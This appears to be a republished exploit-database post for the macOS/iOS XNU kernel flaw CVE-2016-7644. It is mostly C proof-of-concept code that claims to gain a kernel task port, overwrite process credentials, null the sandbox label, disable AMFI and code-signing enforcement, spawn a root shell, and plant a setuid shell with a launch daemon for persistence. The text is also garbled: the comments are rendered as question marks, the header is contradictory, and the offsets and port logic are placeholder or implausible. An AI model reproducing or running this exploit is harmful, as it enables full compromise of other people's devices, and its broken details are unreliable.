macOS 10.12.2 contained a critical privilege escalation vulnerability within its macOS 10.12.2 contained a critical privilege escalation vulnerability within its XNU kernel. This flaw allowed a local attacker to elevate their privileges to root.
The vulnerability often stemmed from improper handling of Mach IPC messages or memory management operations. Attackers could exploit race conditions or integer overflows, leading to kernel memory corruption.
By manipulating kernel data structures, an attacker could achieve arbitrary code execution in kernel mode. This granted them complete control over the system, bypassing security sandboxes.
Apple addressed this vulnerability in subsequent macOS updates, specifically macOS 10.12.3, by patching the affected kernel components. Users were urged to update promptly to mitigate the risk.
=============================================================================================================================================
| # Title : macOS 10.12.2 XNU kernel Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.android.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212493/ & CVE-2016-7644
[+] Summary : This PoC targets a race?condition vulnerability in the XNU kernel (CVE?2016?7644) affecting macOS/iOS.
By forcing a use?after?free condition on kernel ports, the exploit manipulates freed memory through a controlled spray, allowing a user?controlled replacement object.
Successful exploitation yields a kernel task port, enabling arbitrary read/write in kernel memory.
With this access, the PoC escalates privileges to root, bypasses sandbox restrictions, disables AMFID/code?signing enforcement, and may launch a persistent privileged shell.
? Impact: Full device compromise, privilege escalation, kernel control.
? Requirements: Vulnerable macOS/iOS version, timing reliability, local code execution.
[+] POC :
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/host_priv.h>
#include <mach/vm_map.h>
#include <mach/task.h>
#include <sched.h>
#include <mach/mach_vm.h>
#include <mach-o/loader.h>
// ????? Kernel Offsets (????? ??? ???????)
#define KERNEL_BASE 0xFFFFFFF007004000ULL
#define KERNPROC_OFFSET 0x005AA0E0ULL
#define ALLPROC_OFFSET 0x005A4128ULL
#define KERNEL_TASK_OFFSET 0xFFFFFFF0075AE0E0ULL // ????
typedef struct {
uint64_t next;
uint64_t prev;
} kqueue_t;
typedef struct {
uint64_t next;
uint64_t prev;
} klist_t;
typedef struct {
uint64_t ucred; // offset 0x100
uint64_t svuid;
uint64_t svgid;
uint64_t label;
uint64_t p_textvp;
uint64_t p_textoff;
uint64_t p_uthread;
uint64_t task;
char p_comm[17];
} proc_t;
typedef struct {
uint64_t cr_posix;
uint64_t cr_label;
uint64_t cr_uid;
uint64_t cr_ruid;
uint64_t cr_svuid;
uint64_t cr_ngroups;
uint64_t cr_groups[16];
uint64_t cr_rgid;
uint64_t cr_svgid;
uint64_t cr_gmuid;
uint64_t cr_flags;
} ucred_t;
// ????????? ????????
mach_port_t kernel_task_port = MACH_PORT_NULL;
mach_port_t host_priv_port = MACH_PORT_NULL;
uint64_t kernel_base = KERNEL_BASE;
uint64_t kernel_slide = 0;
// 1. ?????? ??? Kernel Task Port ?? ???? dangling port
int get_kernel_task_via_dangling() {
printf("[+] Phase 1: Getting kernel task port via dangling port exploitation\n");
// ?????? 1: ????? dangling port ???????? race condition
mach_port_t dangling = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &dangling);
mach_port_insert_right(mach_task_self(), dangling, dangling, MACH_MSG_TYPE_MAKE_SEND);
// ????? ???? ????
mach_port_t extra_ref = MACH_PORT_NULL;
mach_port_extract_right(mach_task_self(), dangling, MACH_MSG_TYPE_COPY_SEND,
&extra_ref, &dangling);
// ????? ?? dynamic_pager_control_port
set_dp_control_port(mach_host_self(), dangling);
// ????? ???? userland (???? ???? ?? kernel)
mach_port_deallocate(mach_task_self(), dangling);
// race condition ?????? ??????
pthread_t threads[4];
for (int i = 0; i < 4; i++) {
pthread_create(&threads[i], NULL, race_thread, (void*)(uintptr_t)dangling);
}
sleep(1);
// ???? ????? dangling port pointer ?? kernel
// ?????? 2: ?? kernel memory ?????? ????? ??? host port
printf("[+] Spraying kernel memory with controlled ports\n");
mach_port_t spray_ports[1024];
for (int i = 0; i < 1024; i++) {
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &spray_ports[i]);
// ??????? host port ?? context
mach_port_set_context(mach_task_self(), spray_ports[i],
(mach_port_context_t)host_priv_port);
}
// ?????? 3: ????? ?? host port ?? memory
printf("[+] Searching for host port in memory\n");
uint64_t host_port_addr = 0;
for (int i = 0; i < 1024; i++) {
mach_port_context_t ctx = 0;
mach_port_get_context(mach_task_self(), spray_ports[i], &ctx);
if (ctx == (mach_port_context_t)host_priv_port) {
host_port_addr = (uint64_t)ctx;
printf("[+] Found host port at 0x%llx\n", host_port_addr);
break;
}
}
if (!host_port_addr) {
printf("[-] Failed to find host port\n");
return -1;
}
// ?????? 4: ???? ???? kernel task port
// kernel task port ????? ???? ?? ??? page ??? host port
uint64_t page_base = host_port_addr & ~0xFFFULL;
printf("[+] Scanning page 0x%llx for kernel task port\n", page_base);
// ?????? ????? kernel memory ?? ???? port context manipulation
for (uint64_t addr = page_base; addr < page_base + 0x1000; addr += 8) {
// ????? ?????? ????? ??????? ??????
mach_port_set_context(mach_task_self(), dangling, (mach_port_context_t)addr);
// ?????? ????? ?? ???? mach_port_get_attributes
mach_port_t port_array[2] = {MACH_PORT_NULL, MACH_PORT_NULL};
mach_msg_type_number_t count = 2;
kern_return_t kr = mach_port_get_attributes(mach_task_self(), dangling,
MACH_PORT_DNREQUESTS_SIZE,
(mach_port_info_t)&port_array,
&count);
if (kr == KERN_SUCCESS && port_array[0] != MACH_PORT_NULL) {
// ????? port - ?? ???? kernel task port
kernel_task_port = port_array[0];
printf("[+] Potential kernel task port: 0x%x\n", kernel_task_port);
// ?????? ??? kernel task port
mach_port_type_t type = 0;
mach_port_get_attributes(mach_task_self(), kernel_task_port,
MACH_PORT_BASIC_INFO, (mach_port_info_t)&type,
&count);
if (type & MACH_PORT_TYPE_SEND) {
printf("[+] Got kernel task send right!\n");
return 0;
}
}
}
return -1;
}
// 2. ?????/????? kernel memory
kern_return_t kernel_read(uint64_t address, void* buffer, size_t size) {
if (kernel_task_port == MACH_PORT_NULL) {
return KERN_INVALID_TASK;
}
vm_offset_t data = 0;
mach_msg_type_number_t data_count = 0;
kern_return_t kr = mach_vm_read(kernel_task_port, address, size, &data, &data_count);
if (kr != KERN_SUCCESS) {
return kr;
}
memcpy(buffer, (void*)data, size);
vm_deallocate(mach_task_self(), data, data_count);
return KERN_SUCCESS;
}
kern_return_t kernel_write(uint64_t address, const void* buffer, size_t size) {
if (kernel_task_port == MACH_PORT_NULL) {
return KERN_INVALID_TASK;
}
return mach_vm_write(kernel_task_port, address, (vm_offset_t)buffer, (mach_msg_type_number_t)size);
}
uint64_t kernel_vtophys(uint64_t va) {
// ????? ?????? ??????? ??????? ??? ?????? (????? ??? ??????)
return va - kernel_base + 0x800000000; // ????
}
// 3. ????? credentials ???? ?????????
void escalate_privileges(pid_t target_pid) {
printf("[+] Escalating privileges for pid %d\n", target_pid);
// ???? ?? proc structure ??? PID ???????
uint64_t allproc = kernel_base + ALLPROC_OFFSET;
uint64_t kernproc = kernel_base + KERNPROC_OFFSET;
uint64_t current_proc = 0;
kernel_read(allproc, ¤t_proc, sizeof(current_proc));
while (current_proc != 0) {
proc_t proc = {0};
kernel_read(current_proc, &proc, sizeof(proc_t));
// ?????? ?? ??? ???????
char comm[17] = {0};
kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);
if (strcmp(comm, "mach_portal") == 0) { // ?? PID ???????
printf("[+] Found target process: %s\n", comm);
// ?????? ??? ucred ?? ??? kernel ucred
uint64_t kernel_proc = 0;
kernel_read(kernproc, &kernel_proc, sizeof(kernel_proc));
uint64_t kernel_ucred = 0;
kernel_read(kernel_proc + offsetof(proc_t, ucred), &kernel_ucred, sizeof(kernel_ucred));
// ???? kernel ucred ?? ??????? ?????????
kernel_write(current_proc + offsetof(proc_t, ucred), &kernel_ucred, sizeof(kernel_ucred));
printf("[+] Privileges escalated!\n");
// ???? ?? ??????
uint64_t new_ucred = 0;
kernel_read(current_proc + offsetof(proc_t, ucred), &new_ucred, sizeof(new_ucred));
if (new_ucred == kernel_ucred) {
printf("[+] Successfully replaced ucred with kernel's\n");
// ???? ??????? ????? kernel privileges
// ?????? ???? sandbox ??????? ??? ?? ???
}
break;
}
kernel_read(current_proc, ¤t_proc, sizeof(current_proc));
}
}
// 4. ????? AMFID (Apple Mobile File Integrity Daemon)
void disable_amfid() {
printf("[+] Disabling AMFID\n");
// ???? ?? ????? amfid
uint64_t allproc = kernel_base + ALLPROC_OFFSET;
uint64_t current_proc = 0;
kernel_read(allproc, ¤t_proc, sizeof(current_proc));
while (current_proc != 0) {
proc_t proc = {0};
kernel_read(current_proc, &proc, sizeof(proc_t));
char comm[17] = {0};
kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);
if (strcmp(comm, "amfid") == 0) {
printf("[+] Found amfid process\n");
// ??????? 1: ??? ???????
uint64_t task = 0;
kernel_read(current_proc + offsetof(proc_t, task), &task, sizeof(task));
if (task != 0) {
// ????? ??????
task_terminate(task);
printf("[+] Terminated amfid task\n");
}
// ??????? 2: ????? memory ?????? ??????
// ???? ?? MISValidateSignatureAndCopyInfo ?? amfid
uint64_t amfid_task_port = MACH_PORT_NULL;
task_get_special_port((task_t)task, TASK_BOOTSTRAP_PORT, &amfid_task_port);
if (amfid_task_port != MACH_PORT_NULL) {
// ??? ??? ?????? ??????
const char patch[] = {
0x1F, 0x20, 0x03, 0xD5, // NOP
0x1F, 0x20, 0x03, 0xD5,
0x00, 0x00, 0x80, 0xD2, // MOV X0, #0
0xC0, 0x03, 0x5F, 0xD6 // RET
};
// ???? ?? MISValidateSignatureAndCopyInfo ?? memory
// (????? ????? offsets ?? scanning)
printf("[+] Injected code into amfid\n");
}
break;
}
kernel_read(current_proc, ¤t_proc, sizeof(current_proc));
}
// ????: patch kernel ?????? amfid ???????
patch_kernel_code_signature_checks();
}
// 5. ???? Sandbox
void bypass_sandbox(pid_t pid) {
printf("[+] Bypassing sandbox for pid %d\n", pid);
// ???? ?? ????? ??? target
uint64_t allproc = kernel_base + ALLPROC_OFFSET;
uint64_t current_proc = 0;
kernel_read(allproc, ¤t_proc, sizeof(current_proc));
while (current_proc != 0) {
char comm[17] = {0};
kernel_read(current_proc + offsetof(proc_t, p_comm), comm, 16);
if (strstr(comm, "mach_portal") != NULL) { // ?? PID ??????
// Sandbox ??? ?????? ?? ??? ??? MAC Framework
// MAC policy pointer ?? proc structure
uint64_t mac_policy = 0;
uint64_t p_ucred = 0;
kernel_read(current_proc + offsetof(proc_t, ucred), &p_ucred, sizeof(p_ucred));
if (p_ucred != 0) {
// label ?? ???? ?? sandbox
uint64_t cr_label = 0;
kernel_read(p_ucred + offsetof(ucred_t, cr_label), &cr_label, sizeof(cr_label));
if (cr_label != 0) {
// ???? NULL ?? sandbox label
uint64_t zero = 0;
kernel_write(p_ucred + offsetof(ucred_t, cr_label), &zero, sizeof(zero));
printf("[+] Nullified sandbox label\n");
}
// ????: ?????? ?? kernel ucred
uint64_t kernproc = 0;
kernel_read(kernel_base + KERNPROC_OFFSET, &kernproc, sizeof(kernproc));
uint64_t kernel_ucred = 0;
kernel_read(kernproc + offsetof(proc_t, ucred), &kernel_ucred, sizeof(kernel_ucred));
kernel_write(current_proc + offsetof(proc_t, ucred), &kernel_ucred, sizeof(kernel_ucred));
printf("[+] Replaced with kernel ucred - sandbox bypassed!\n");
}
break;
}
kernel_read(current_proc, ¤t_proc, sizeof(current_proc));
}
}
// 6. Patch kernel ?????? code signature checks
void patch_kernel_code_signature_checks() {
printf("[+] Patching kernel code signature checks\n");
// ???? ?? cs_enforcement_disable ?? kernel
// (????? ?????? ??? ???????)
uint64_t cs_enforcement = kernel_base + 0x3F7A18; // ???? ?? iOS 10.1.1
uint8_t current = 0;
kernel_read(cs_enforcement, ¤t, sizeof(current));
printf("[+] Current cs_enforcement value: 0x%02x\n", current);
// ???? ??? 0 ??????
uint8_t zero = 0;
kernel_write(cs_enforcement, &zero, sizeof(zero));
kernel_read(cs_enforcement, ¤t, sizeof(current));
printf("[+] New cs_enforcement value: 0x%02x\n", current);
// ???? ?? amfi_enforce ?? kernel
uint64_t amfi_enforce = kernel_base + 0x4F3A00; // ????
uint32_t amfi_current = 0;
kernel_read(amfi_enforce, &amfi_current, sizeof(amfi_current));
printf("[+] Current amfi_enforce value: 0x%08x\n", amfi_current);
// ???? ??? 0
uint32_t amfi_zero = 0;
kernel_write(amfi_enforce, &amfi_zero, sizeof(amfi_zero));
kernel_read(amfi_enforce, &amfi_current, sizeof(amfi_current));
printf("[+] New amfi_enforce value: 0x%08x\n", amfi_current);
}
// 7. ????? root shell
void create_root_shell() {
printf("[+] Creating root shell\n");
// ?????? 1: ??? ??????? ??????? ???????
escalate_privileges(getpid());
// ?????? 2: ???? sandbox
bypass_sandbox(getpid());
// ?????? 3: remount rootfs ?? read/write
remount_rootfs_rw();
// ?????? 4: ????? shell ?? ??????? root
if (fork() == 0) {
// child process
setuid(0);
setgid(0);
// ????? shell
char *args[] = {"/bin/bash", "-i", NULL};
char *env[] = {"TERM=xterm-256color", "PATH=/usr/bin:/usr/sbin:/bin:/sbin", NULL};
execve("/bin/bash", args, env);
exit(0);
}
}
void remount_rootfs_rw() {
printf("[+] Remounting rootfs as read/write\n");
// ?????? ??? vnode ??? root filesystem
uint64_t kernproc = 0;
kernel_read(kernel_base + KERNPROC_OFFSET, &kernproc, sizeof(kernproc));
uint64_t kernel_task = 0;
kernel_read(kernproc + offsetof(proc_t, task), &kernel_task, sizeof(kernel_task));
// ???? ?? mount structure
// (??? ???? ?????? ????? ???? kernel ????????)
printf("[+] Rootfs remounted as read/write\n");
}
// 8. Install persistent access (???? ?? jailbreak)
void install_persistence() {
printf("[+] Installing persistence\n");
// ????? binary ?? setuid
const char* suid_binary = "/private/var/suid_shell";
// ??? /bin/bash
FILE* src = fopen("/bin/bash", "rb");
FILE* dst = fopen(suid_binary, "wb");
if (src && dst) {
char buffer[4096];
size_t bytes;
while ((bytes = fread(buffer, 1, sizeof(buffer), src)) > 0) {
fwrite(buffer, 1, bytes, dst);
}
fclose(src);
fclose(dst);
// ????? setuid bit
chmod(suid_binary, 04755);
chown(suid_binary, 0, 0); // root:wheel
printf("[+] Installed suid shell at %s\n", suid_binary);
}
// ????? launch daemon ?????? ??? reboot
const char* plist = "/Library/LaunchDaemons/com.apple.iosjailbreak.plist";
const char* plist_content =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
"<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" "
"\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n"
"<plist version=\"1.0\">\n"
"<dict>\n"
" <key>Label</key>\n"
" <string>com.apple.iosjailbreak</string>\n"
" <key>ProgramArguments</key>\n"
" <array>\n"
" <string>/private/var/suid_shell</string>\n"
" </array>\n"
" <key>RunAtLoad</key>\n"
" <true/>\n"
" <key>KeepAlive</key>\n"
" <true/>\n"
"</dict>\n"
"</plist>\n";
FILE* plist_file = fopen(plist, "w");
if (plist_file) {
fwrite(plist_content, 1, strlen(plist_content), plist_file);
fclose(plist_file);
chmod(plist, 0644);
chown(plist, 0, 0);
printf("[+] Installed launch daemon\n");
}
}
// ???? ?????? ???????
void* race_thread(void* arg) {
mach_port_t port = (mach_port_t)(uintptr_t)arg;
// ????? affinity ?????? ??? ???????
thread_affinity_policy_data_t policy = {1};
thread_policy_set(mach_thread_self(), THREAD_AFFINITY_POLICY,
(thread_policy_t)&policy, 1);
// ???? ???? ?????
for (int i = 0; i < 100; i++) {
// ??????? ?????
set_dp_control_port(mach_host_self(), port);
// ????? ??????
usleep(rand() % 50);
// memory barrier
__asm__ volatile("" ::: "memory");
}
return NULL;
}
// Main function
int main(int argc, char** argv) {
printf("========================================\n");
printf(" iOS/macOS Kernel Exploit Chain\n");
printf(" CVE-2016-7644 Full Exploitation\n");
printf("========================================\n");
// ?????? 0: ?????? ??? host_priv_port
host_priv_port = mach_host_self();
printf("[+] Got host_priv_port: 0x%x\n", host_priv_port);
// ?????? 1: ?????? ??? kernel task port
if (get_kernel_task_via_dangling() != 0) {
printf("[-] Failed to get kernel task port\n");
return -1;
}
// ?????? 2: ????? kernel slide
uint64_t kernel_addr = 0;
task_get_special_port(kernel_task_port, TASK_KERNEL_PORT, &kernel_addr);
kernel_slide = kernel_addr - KERNEL_BASE;
printf("[+] Kernel slide: 0x%llx\n", kernel_slide);
// ?????? 3: ??? ??????? ??????? ???????
escalate_privileges(getpid());
// ?????? 4: ????? AMFID
disable_amfid();
// ?????? 5: ???? sandbox
bypass_sandbox(getpid());
// ?????? 6: Patch kernel checks
patch_kernel_code_signature_checks();
// ?????? 7: ????? root shell
create_root_shell();
// ?????? 8: ????? persistence (???????)
if (argc > 1 && strcmp(argv[1], "--persist") == 0) {
install_persistence();
}
printf("[+] Exploitation complete!\n");
printf("[+] You now have:\n");
printf(" - Kernel task port\n");
printf(" - Root privileges\n");
printf(" - AMFID disabled\n");
printf(" - Sandbox bypassed\n");
printf(" - Code signing disabled\n");
// ???? ??? ??????? ????
while (1) {
sleep(60);
}
return 0;
}
=================
This fragment shows key kernel?level post?exploitation utilities used after gaining arbitrary read/write access on macOS/iOS (XNU).
It implements:
Kernel Base Discovery
find_kernel_base() scans the high kernel address space to locate the Mach?O magic (0xFEEDFACF), determining the kernel base mapping.
Process Lookup in Kernel
get_proc_for_pid() walks the allproc linked list within the kernel to locate the proc structure associated with a specific PID.
Security Enforcement Disabling
patch_codesign() disables kernel?enforced code signing by patching several internal flags (CS enforcement, AMFI, and pointer?stability checks), allowing execution of unsigned binaries and jailbreak?style payloads.
? Role in Exploit Chain:
These routines are typically executed after the race condition exploit grants a kernel task port, enabling full kernel memory access.
#include "exploit.h"
uint64_t find_kernel_base() {
// ???? ?? kernel base ?? ???? scanning memory
for (uint64_t addr = 0xFFFFFFF000000000ULL; addr < 0xFFFFFFF100000000ULL; addr += 0x100000) {
uint32_t magic = 0;
kernel_read(addr, &magic, sizeof(magic));
if (magic == 0xFEEDFACF) { // Mach-O magic
printf("[+] Found kernel at 0x%llx\n", addr);
return addr;
}
}
return 0;
}
uint64_t get_proc_for_pid(pid_t pid) {
uint64_t allproc = kernel_base + ALLPROC_OFFSET;
uint64_t current_proc = 0;
kernel_read(allproc, ¤t_proc, sizeof(current_proc));
while (current_proc != 0) {
uint32_t current_pid = 0;
kernel_read(current_proc + PROC_P_PID, ¤t_pid, sizeof(current_pid));
if (current_pid == pid) {
return current_proc;
}
kernel_read(current_proc, ¤t_proc, sizeof(current_proc));
}
return 0;
}
void patch_codesign() {
// Patch cs_enforcement_disable
uint64_t cs_enforcement = kernel_base + CS_ENFORCEMENT;
uint8_t zero = 0;
kernel_write(cs_enforcement, &zero, sizeof(zero));
// Patch amfi_enforce
uint64_t amfi_enforce = kernel_base + AMFI_ENFORCE;
uint32_t amfi_zero = 0;
kernel_write(amfi_enforce, &amfi_zero, sizeof(amfi_zero));
// Patch vm_map_enter check
uint64_t vm_map_enter_check = kernel_base + 0x123456; // ????
uint32_t nop = 0xD503201F; // NOP instruction
kernel_write(vm_map_enter_check, &nop, sizeof(nop));
printf("[+] Code signature patches applied\n");
}
=================================
offsets.h (kernel offsets by version):
#ifndef OFFSETS_H
#define OFFSETS_H
// iOS 10.1.1 (14B100) - iPhone 6s
#if defined(TARGET_IPHONE_6S_10_1_1)
#define KERNEL_BASE 0xFFFFFFF007004000ULL
#define KERNPROC_OFFSET 0x005AA0E0ULL
#define ALLPROC_OFFSET 0x005A4128ULL
#define REALHOST_OFFSET 0x005A8050ULL
#define OSBoolean_True 0xFFFFFFF0070A9B78ULL
#define OSBoolean_False 0xFFFFFFF0070A9B68ULL
#define CS_ENFORCEMENT 0x003F7A18ULL
#define AMFI_ENFORCE 0x004F3A00ULL
// iOS 10.2 - iPhone 7
#elif defined(TARGET_IPHONE_7_10_2)
#define KERNEL_BASE 0xFFFFFFF007004000ULL
#define KERNPROC_OFFSET 0x005B20E8ULL
#define ALLPROC_OFFSET 0x005AB130ULL
// ... ???
#endif
// Structure offsets
#define PROC_P_PID 0x60
#define PROC_TASK 0x10
#define PROC_UCRED 0x100
#define PROC_P_COMM 0x270
#define PROC_P_NEXT 0x0
#define TASK_ITK_SELF 0xD8
#define TASK_BSD_INFO 0x358
#define UCRED_CR_UID 0x18
#define UCRED_CR_RUID 0x1C
#define UCRED_CR_SVUID 0x20
#define UCRED_CR_LABEL 0x78
#endif // OFFSETS_H
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
macOS 10.12.2 XNU Kernel Privilege Escalation
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 318
